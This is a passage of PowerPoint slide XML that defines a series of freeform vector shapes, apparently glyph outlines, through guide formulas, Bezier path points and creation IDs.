                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{076B8DA1-B0F7-403E-B762-1A90AC75AF28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5026025" y="3797300"/>
              <a:ext cx="106363" cy="1031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6 h 223"/>
                <a:gd name="T10" fmla="*/ 184 w 234"/>
                <a:gd name="T11" fmla="*/ 78 h 223"/>
                <a:gd name="T12" fmla="*/ 86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8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3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6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6" name="Freeform 841">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7715B3C7-C18F-4CE2-A8F0-DEF9D28D0F36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5138738" y="3770313"/>
              <a:ext cx="96838" cy="130175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4 w 211"/>
                <a:gd name="T25" fmla="*/ 91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7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3"/>
                    <a:pt x="148" y="248"/>
                    <a:pt x="137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7" name="Freeform 842">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB1530F7-FDB8-4779-A6E1-D08924D02D27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5294313" y="3870325"/>
              <a:ext cx="38100" cy="61913"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 51 w 82"/>
                <a:gd name="T1" fmla="*/ 60 h 131"/>
                <a:gd name="T2" fmla="*/ 14 w 82"/>
                <a:gd name="T3" fmla="*/ 101 h 131"/>
                <a:gd name="T4" fmla="*/ 0 w 82"/>
                <a:gd name="T5" fmla="*/ 115 h 131"/>
                <a:gd name="T6" fmla="*/ 16 w 82"/>
                <a:gd name="T7" fmla="*/ 131 h 131"/>
                <a:gd name="T8" fmla="*/ 82 w 82"/>
                <a:gd name="T9" fmla="*/ 49 h 131"/>
                <a:gd name="T10" fmla="*/ 41 w 82"/>
                <a:gd name="T11" fmla="*/ 0 h 131"/>
                <a:gd name="T12" fmla="*/ 10 w 82"/>
                <a:gd name="T13" fmla="*/ 30 h 131"/>
                <a:gd name="T14" fmla="*/ 41 w 82"/>
                <a:gd name="T15" fmla="*/ 62 h 131"/>
                <a:gd name="T16" fmla="*/ 51 w 82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2" y="104"/>
                    <a:pt x="82" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="82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0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8" name="Freeform 843">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81B61D60-A056-47A5-B9A2-B184B8F747AA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5540375" y="3870325"/>
              <a:ext cx="28575" cy="3016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0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0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6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9" name="Freeform 844">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C1DF08C-2E8E-4D04-9E58-B808FFEC5A65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5659438" y="3870325"/>
              <a:ext cx="28575" cy="30163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0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0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6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0" name="Freeform 845">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFF39D62-A671-4A3C-844B-DE477171D166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5780088" y="3870325"/>
              <a:ext cx="28575" cy="3016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0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0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6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1" name="Freeform 846">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{185BD6D6-936E-4B0D-9E31-4874F029A247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5875338" y="3736975"/>
              <a:ext cx="60325" cy="182563"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 131 w 131"/>
                <a:gd name="T1" fmla="*/ 193 h 387"/>
                <a:gd name="T2" fmla="*/ 91 w 131"/>
                <a:gd name="T3" fmla="*/ 64 h 387"/>
                <a:gd name="T4" fmla="*/ 15 w 131"/>
                <a:gd name="T5" fmla="*/ 0 h 387"/>
                <a:gd name="T6" fmla="*/ 0 w 131"/>
                <a:gd name="T7" fmla="*/ 14 h 387"/>
                <a:gd name="T8" fmla="*/ 8 w 131"/>
                <a:gd name="T9" fmla="*/ 26 h 387"/>
                <a:gd name="T10" fmla="*/ 97 w 131"/>
                <a:gd name="T11" fmla="*/ 193 h 387"/>
                <a:gd name="T12" fmla="*/ 11 w 131"/>
                <a:gd name="T13" fmla="*/ 358 h 387"/>
                <a:gd name="T14" fmla="*/ 0 w 131"/>
                <a:gd name="T15" fmla="*/ 373 h 387"/>
                <a:gd name="T16" fmla="*/ 15 w 131"/>
                <a:gd name="T17" fmla="*/ 387 h 387"/>
                <a:gd name="T18" fmla="*/ 131 w 131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193"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="134"/>
                    <a:pt x="108" y="89"/>
                    <a:pt x="91" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64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89" y="81"/>
                    <a:pt x="97" y="161"/>
                    <a:pt x="97" y="193"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="243"/>
                    <a:pt x="78" y="312"/>
                    <a:pt x="11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1" y="321"/>
                    <a:pt x="131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2" name="Freeform 847">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D821808-5C38-4B7B-B64E-4C28DF7698E5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6015038" y="3798888"/>
              <a:ext cx="34925" cy="133350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 72 w 75"/>
                <a:gd name="T1" fmla="*/ 31 h 284"/>
                <a:gd name="T2" fmla="*/ 41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2 w 75"/>
                <a:gd name="T9" fmla="*/ 31 h 284"/>
                <a:gd name="T10" fmla="*/ 43 w 75"/>
                <a:gd name="T11" fmla="*/ 215 h 284"/>
                <a:gd name="T12" fmla="*/ 10 w 75"/>
                <a:gd name="T13" fmla="*/ 255 h 284"/>
                <a:gd name="T14" fmla="*/ 0 w 75"/>
                <a:gd name="T15" fmla="*/ 268 h 284"/>
                <a:gd name="T16" fmla="*/ 16 w 75"/>
                <a:gd name="T17" fmla="*/ 284 h 284"/>
                <a:gd name="T18" fmla="*/ 75 w 75"/>
                <a:gd name="T19" fmla="*/ 201 h 284"/>
                <a:gd name="T20" fmla="*/ 41 w 75"/>
                <a:gd name="T21" fmla="*/ 153 h 284"/>
                <a:gd name="T22" fmla="*/ 10 w 75"/>
                <a:gd name="T23" fmla="*/ 183 h 284"/>
                <a:gd name="T24" fmla="*/ 43 w 75"/>
                <a:gd name="T25" fmla="*/ 21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2" y="31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2" y="47"/>
                    <a:pt x="72" y="31"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="43" y="215"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="242"/>
                    <a:pt x="17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7" y="284"/>
                    <a:pt x="16" y="284"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="284"/>
                    <a:pt x="75" y="257"/>
                    <a:pt x="75" y="201"/>
                  </a:cubicBez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3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="197"/>
                    <a:pt x="18" y="215"/>
                    <a:pt x="43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3" name="Freeform 848">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DD8F8C1-E1B0-4520-B6C6-A6630701A235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704850" y="4037013"/>
              <a:ext cx="87313" cy="142875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0 w 188"/>
                <a:gd name="T15" fmla="*/ 274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49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7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49"/>
                    <a:pt x="90" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="49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4" name="Freeform 849">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66903581-97F6-4E51-B21C-FC406ABD876D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809625" y="4078288"/>
              <a:ext cx="114300" cy="101600"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 76 w 249"/>
                <a:gd name="T1" fmla="*/ 26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19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19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7 h 218"/>
                <a:gd name="T48" fmla="*/ 206 w 249"/>
                <a:gd name="T49" fmla="*/ 187 h 218"/>
                <a:gd name="T50" fmla="*/ 206 w 249"/>
                <a:gd name="T51" fmla="*/ 72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6" y="187"/>
                    <a:pt x="228" y="187"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="206" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206" y="72"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="206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5" name="Freeform 850">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73B581C8-0323-4CC0-8039-BADCE33E3154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933450" y="4051300"/>
              <a:ext cx="96838" cy="130175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199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19 w 211"/>
                <a:gd name="T23" fmla="*/ 91 h 279"/>
                <a:gd name="T24" fmla="*/ 63 w 211"/>
                <a:gd name="T25" fmla="*/ 91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3 w 211"/>
                <a:gd name="T33" fmla="*/ 194 h 279"/>
                <a:gd name="T34" fmla="*/ 177 w 211"/>
                <a:gd name="T35" fmla="*/ 212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199" y="91"/>
                    <a:pt x="199" y="76"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="199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19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3" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="194"/>
                    <a:pt x="177" y="204"/>
                    <a:pt x="177" y="212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2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6" name="Freeform 851">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10491E9A-AFFE-458B-A749-3E4DA9EC18CF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1184275" y="4076700"/>
              <a:ext cx="88900" cy="104775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7" name="Freeform 852">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE8483B3-B729-4C6D-8FB0-2362E0733603}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId139"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1290638" y="4078288"/>
              <a:ext cx="109538" cy="153988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0 h 329"/>
                <a:gd name="T4" fmla="*/ 203 w 237"/>
                <a:gd name="T5" fmla="*/ 110 h 329"/>
                <a:gd name="T6" fmla="*/ 133 w 237"/>
                <a:gd name="T7" fmla="*/ 190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5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4 h 329"/>
                <a:gd name="T22" fmla="*/ 56 w 237"/>
                <a:gd name="T23" fmla="*/ 3 h 329"/>
                <a:gd name="T24" fmla="*/ 20 w 237"/>
                <a:gd name="T25" fmla="*/ 3 h 329"/>
                <a:gd name="T26" fmla="*/ 0 w 237"/>
                <a:gd name="T27" fmla="*/ 18 h 329"/>
                <a:gd name="T28" fmla="*/ 20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5"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="216"/>
                    <a:pt x="118" y="221"/>
                    <a:pt x="134" y="221"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="221"/>
                    <a:pt x="237" y="173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8" name="Freeform 853">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC4F65B0-B512-476E-B8FE-69906950C594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1416050" y="4078288"/>
              <a:ext cx="103188" cy="101600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9" name="Freeform 854">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6AB36DF-D905-447E-B2D5-525869693466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1546225" y="4037013"/>
              <a:ext cx="87313" cy="142875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0 w 188"/>
                <a:gd name="T11" fmla="*/ 120 h 305"/>
                <a:gd name="T12" fmla="*/ 80 w 188"/>
                <a:gd name="T13" fmla="*/ 274 h 305"/>
                <a:gd name="T14" fmla="*/ 20 w 188"/>
                <a:gd name="T15" fmla="*/ 274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49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0" y="120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80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7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49"/>
                    <a:pt x="90" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="49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0" name="Freeform 855">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBFBCD6B-A1B6-4538-B13A-C1671E9E3A4A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1651000" y="4078288"/>
              <a:ext cx="114300" cy="101600"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 77 w 249"/>
                <a:gd name="T1" fmla="*/ 26 h 218"/>
                <a:gd name="T2" fmla="*/ 57 w 249"/>
                <a:gd name="T3" fmla="*/ 3 h 218"/>
                <a:gd name="T4" fmla="*/ 21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3 w 249"/>
                <a:gd name="T11" fmla="*/ 33 h 218"/>
                <a:gd name="T12" fmla="*/ 43 w 249"/>
                <a:gd name="T13" fmla="*/ 187 h 218"/>
                <a:gd name="T14" fmla="*/ 21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7 h 218"/>
                <a:gd name="T26" fmla="*/ 77 w 249"/>
                <a:gd name="T27" fmla="*/ 187 h 218"/>
                <a:gd name="T28" fmla="*/ 77 w 249"/>
                <a:gd name="T29" fmla="*/ 99 h 218"/>
                <a:gd name="T30" fmla="*/ 139 w 249"/>
                <a:gd name="T31" fmla="*/ 30 h 218"/>
                <a:gd name="T32" fmla="*/ 173 w 249"/>
                <a:gd name="T33" fmla="*/ 74 h 218"/>
                <a:gd name="T34" fmla="*/ 173 w 249"/>
                <a:gd name="T35" fmla="*/ 187 h 218"/>
                <a:gd name="T36" fmla="*/ 153 w 249"/>
                <a:gd name="T37" fmla="*/ 187 h 218"/>
                <a:gd name="T38" fmla="*/ 133 w 249"/>
                <a:gd name="T39" fmla="*/ 203 h 218"/>
                <a:gd name="T40" fmla="*/ 153 w 249"/>
                <a:gd name="T41" fmla="*/ 218 h 218"/>
                <a:gd name="T42" fmla="*/ 230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1" name="Freeform 856">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B64360A-C646-4049-8072-3A6882FA4D43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1774825" y="4051300"/>
              <a:ext cx="96838" cy="130175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2 h 279"/>
                <a:gd name="T36" fmla="*/ 137 w 212"/>
                <a:gd name="T37" fmla="*/ 248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2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8" y="248"/>
                    <a:pt x="98" y="222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2" name="Freeform 857">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03C05038-E11A-4472-B515-C9070AF63810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1898650" y="4035425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69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6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8 h 308"/>
                <a:gd name="T28" fmla="*/ 21 w 197"/>
                <a:gd name="T29" fmla="*/ 123 h 308"/>
                <a:gd name="T30" fmla="*/ 71 w 197"/>
                <a:gd name="T31" fmla="*/ 123 h 308"/>
                <a:gd name="T32" fmla="*/ 71 w 197"/>
                <a:gd name="T33" fmla="*/ 277 h 308"/>
                <a:gd name="T34" fmla="*/ 21 w 197"/>
                <a:gd name="T35" fmla="*/ 277 h 308"/>
                <a:gd name="T36" fmla="*/ 0 w 197"/>
                <a:gd name="T37" fmla="*/ 292 h 308"/>
                <a:gd name="T38" fmla="*/ 21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69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1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3" name="Freeform 858">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABF4FD6B-8B2F-47E0-B4ED-4DC4ED8B5466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2047875" y="4017963"/>
              <a:ext cx="61913" cy="180975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7 h 387"/>
                <a:gd name="T4" fmla="*/ 34 w 132"/>
                <a:gd name="T5" fmla="*/ 193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3 h 387"/>
                <a:gd name="T14" fmla="*/ 40 w 132"/>
                <a:gd name="T15" fmla="*/ 322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5"/>
                    <a:pt x="128" y="363"/>
                    <a:pt x="119" y="357"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="315"/>
                    <a:pt x="34" y="249"/>
                    <a:pt x="34" y="193"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="143"/>
                    <a:pt x="53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3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="253"/>
                    <a:pt x="23" y="297"/>
                    <a:pt x="40" y="322"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="359"/>
                    <a:pt x="104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4" name="Freeform 859">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6962CC1-6551-43CE-AB11-347B075290E2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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2146300" y="4076700"/>
              <a:ext cx="90488" cy="104775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5" name="Freeform 860">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6BDD6C3-65B6-47FD-BBFF-76962D371249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2252663" y="4037013"/>
              <a:ext cx="114300" cy="142875"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 207 w 249"/>
                <a:gd name="T1" fmla="*/ 159 h 305"/>
                <a:gd name="T2" fmla="*/ 142 w 249"/>
                <a:gd name="T3" fmla="*/ 87 h 305"/>
                <a:gd name="T4" fmla="*/ 77 w 249"/>
                <a:gd name="T5" fmla="*/ 113 h 305"/>
                <a:gd name="T6" fmla="*/ 77 w 249"/>
                <a:gd name="T7" fmla="*/ 21 h 305"/>
                <a:gd name="T8" fmla="*/ 57 w 249"/>
                <a:gd name="T9" fmla="*/ 0 h 305"/>
                <a:gd name="T10" fmla="*/ 20 w 249"/>
                <a:gd name="T11" fmla="*/ 0 h 305"/>
                <a:gd name="T12" fmla="*/ 0 w 249"/>
                <a:gd name="T13" fmla="*/ 16 h 305"/>
                <a:gd name="T14" fmla="*/ 20 w 249"/>
                <a:gd name="T15" fmla="*/ 31 h 305"/>
                <a:gd name="T16" fmla="*/ 42 w 249"/>
                <a:gd name="T17" fmla="*/ 31 h 305"/>
                <a:gd name="T18" fmla="*/ 42 w 249"/>
                <a:gd name="T19" fmla="*/ 274 h 305"/>
                <a:gd name="T20" fmla="*/ 20 w 249"/>
                <a:gd name="T21" fmla="*/ 274 h 305"/>
                <a:gd name="T22" fmla="*/ 0 w 249"/>
                <a:gd name="T23" fmla="*/ 290 h 305"/>
                <a:gd name="T24" fmla="*/ 20 w 249"/>
                <a:gd name="T25" fmla="*/ 305 h 305"/>
                <a:gd name="T26" fmla="*/ 99 w 249"/>
                <a:gd name="T27" fmla="*/ 305 h 305"/>
                <a:gd name="T28" fmla="*/ 119 w 249"/>
                <a:gd name="T29" fmla="*/ 290 h 305"/>
                <a:gd name="T30" fmla="*/ 98 w 249"/>
                <a:gd name="T31" fmla="*/ 274 h 305"/>
                <a:gd name="T32" fmla="*/ 77 w 249"/>
                <a:gd name="T33" fmla="*/ 274 h 305"/>
                <a:gd name="T34" fmla="*/ 77 w 249"/>
                <a:gd name="T35" fmla="*/ 186 h 305"/>
                <a:gd name="T36" fmla="*/ 139 w 249"/>
                <a:gd name="T37" fmla="*/ 117 h 305"/>
                <a:gd name="T38" fmla="*/ 172 w 249"/>
                <a:gd name="T39" fmla="*/ 161 h 305"/>
                <a:gd name="T40" fmla="*/ 172 w 249"/>
                <a:gd name="T41" fmla="*/ 274 h 305"/>
                <a:gd name="T42" fmla="*/ 153 w 249"/>
                <a:gd name="T43" fmla="*/ 274 h 305"/>
                <a:gd name="T44" fmla="*/ 132 w 249"/>
                <a:gd name="T45" fmla="*/ 290 h 305"/>
                <a:gd name="T46" fmla="*/ 153 w 249"/>
                <a:gd name="T47" fmla="*/ 305 h 305"/>
                <a:gd name="T48" fmla="*/ 229 w 249"/>
                <a:gd name="T49" fmla="*/ 305 h 305"/>
                <a:gd name="T50" fmla="*/ 249 w 249"/>
                <a:gd name="T51" fmla="*/ 290 h 305"/>
                <a:gd name="T52" fmla="*/ 229 w 249"/>
                <a:gd name="T53" fmla="*/ 274 h 305"/>
                <a:gd name="T54" fmla="*/ 207 w 249"/>
                <a:gd name="T55" fmla="*/ 274 h 305"/>
                <a:gd name="T56" fmla="*/ 207 w 249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07" y="159"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="108"/>
                    <a:pt x="181" y="87"/>
                    <a:pt x="142" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="87"/>
                    <a:pt x="86" y="104"/>
                    <a:pt x="77" y="113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4"/>
                    <a:pt x="106" y="274"/>
                    <a:pt x="98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3" y="117"/>
                    <a:pt x="139" y="117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="165" y="117"/>
                    <a:pt x="172" y="131"/>
                    <a:pt x="172" y="161"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="172" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="274"/>
                    <a:pt x="132" y="274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  <a:cubicBezTo>
                    <a:pt x="249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6" name="Freeform 861">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82CABDC2-E060-4307-B6CA-4E9EEAD814F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2382838" y="4076700"/>
              <a:ext cx="106363" cy="10477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5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5 w 234"/>
                <a:gd name="T39" fmla="*/ 192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5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0" y="223"/>
                    <a:pt x="131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7" name="Freeform 862">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{551FB3CC-80C9-4C9D-BB86-6B365DB8247F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2497138" y="4078288"/>
              <a:ext cx="104775" cy="101600"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 94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4 w 227"/>
                <a:gd name="T11" fmla="*/ 40 h 218"/>
                <a:gd name="T12" fmla="*/ 94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7 h 218"/>
                <a:gd name="T38" fmla="*/ 94 w 227"/>
                <a:gd name="T39" fmla="*/ 187 h 218"/>
                <a:gd name="T40" fmla="*/ 94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4" y="125"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="94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4" y="187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8" name="Freeform 863">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC64C803-1634-4D38-89AC-CC123D7747FE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2746375" y="4057650"/>
              <a:ext cx="87313" cy="101600"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 112 w 193"/>
                <a:gd name="T1" fmla="*/ 134 h 215"/>
                <a:gd name="T2" fmla="*/ 158 w 193"/>
                <a:gd name="T3" fmla="*/ 162 h 215"/>
                <a:gd name="T4" fmla="*/ 177 w 193"/>
                <a:gd name="T5" fmla="*/ 170 h 215"/>
                <a:gd name="T6" fmla="*/ 193 w 193"/>
                <a:gd name="T7" fmla="*/ 153 h 215"/>
                <a:gd name="T8" fmla="*/ 186 w 193"/>
                <a:gd name="T9" fmla="*/ 140 h 215"/>
                <a:gd name="T10" fmla="*/ 127 w 193"/>
                <a:gd name="T11" fmla="*/ 108 h 215"/>
                <a:gd name="T12" fmla="*/ 181 w 193"/>
                <a:gd name="T13" fmla="*/ 78 h 215"/>
                <a:gd name="T14" fmla="*/ 193 w 193"/>
                <a:gd name="T15" fmla="*/ 62 h 215"/>
                <a:gd name="T16" fmla="*/ 173 w 193"/>
                <a:gd name="T17" fmla="*/ 45 h 215"/>
                <a:gd name="T18" fmla="*/ 112 w 193"/>
                <a:gd name="T19" fmla="*/ 81 h 215"/>
                <a:gd name="T20" fmla="*/ 113 w 193"/>
                <a:gd name="T21" fmla="*/ 21 h 215"/>
                <a:gd name="T22" fmla="*/ 97 w 193"/>
                <a:gd name="T23" fmla="*/ 0 h 215"/>
                <a:gd name="T24" fmla="*/ 80 w 193"/>
                <a:gd name="T25" fmla="*/ 21 h 215"/>
                <a:gd name="T26" fmla="*/ 82 w 193"/>
                <a:gd name="T27" fmla="*/ 81 h 215"/>
                <a:gd name="T28" fmla="*/ 28 w 193"/>
                <a:gd name="T29" fmla="*/ 50 h 215"/>
                <a:gd name="T30" fmla="*/ 16 w 193"/>
                <a:gd name="T31" fmla="*/ 45 h 215"/>
                <a:gd name="T32" fmla="*/ 0 w 193"/>
                <a:gd name="T33" fmla="*/ 62 h 215"/>
                <a:gd name="T34" fmla="*/ 12 w 193"/>
                <a:gd name="T35" fmla="*/ 78 h 215"/>
                <a:gd name="T36" fmla="*/ 66 w 193"/>
                <a:gd name="T37" fmla="*/ 107 h 215"/>
                <a:gd name="T38" fmla="*/ 12 w 193"/>
                <a:gd name="T39" fmla="*/ 137 h 215"/>
                <a:gd name="T40" fmla="*/ 0 w 193"/>
                <a:gd name="T41" fmla="*/ 153 h 215"/>
                <a:gd name="T42" fmla="*/ 20 w 193"/>
                <a:gd name="T43" fmla="*/ 170 h 215"/>
                <a:gd name="T44" fmla="*/ 82 w 193"/>
                <a:gd name="T45" fmla="*/ 134 h 215"/>
                <a:gd name="T46" fmla="*/ 80 w 193"/>
                <a:gd name="T47" fmla="*/ 194 h 215"/>
                <a:gd name="T48" fmla="*/ 97 w 193"/>
                <a:gd name="T49" fmla="*/ 215 h 215"/>
                <a:gd name="T50" fmla="*/ 113 w 193"/>
                <a:gd name="T51" fmla="*/ 194 h 215"/>
                <a:gd name="T52" fmla="*/ 112 w 193"/>
                <a:gd name="T53" fmla="*/ 13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12" y="134"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="151"/>
                    <a:pt x="124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3" y="161"/>
                    <a:pt x="193" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="145"/>
                    <a:pt x="187" y="140"/>
                    <a:pt x="186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3" y="71"/>
                    <a:pt x="193" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="60"/>
                    <a:pt x="193" y="45"/>
                    <a:pt x="173" y="45"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="112" y="81"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="68"/>
                    <a:pt x="113" y="35"/>
                    <a:pt x="113" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="16"/>
                    <a:pt x="113" y="0"/>
                    <a:pt x="97" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="0"/>
                    <a:pt x="80" y="16"/>
                    <a:pt x="80" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="35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5"/>
                    <a:pt x="20" y="45"/>
                    <a:pt x="16" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="45"/>
                    <a:pt x="0" y="54"/>
                    <a:pt x="0" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="71"/>
                    <a:pt x="5" y="74"/>
                    <a:pt x="12" y="78"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="66" y="107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="137"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="6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8"/>
                    <a:pt x="80" y="215"/>
                    <a:pt x="97" y="215"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="215"/>
                    <a:pt x="113" y="198"/>
                    <a:pt x="113" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="180"/>
                    <a:pt x="113" y="147"/>
                    <a:pt x="112" y="1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9" name="Freeform 864">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C9A2806-F08F-48EB-A88C-2107054CA471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2867025" y="4076700"/>
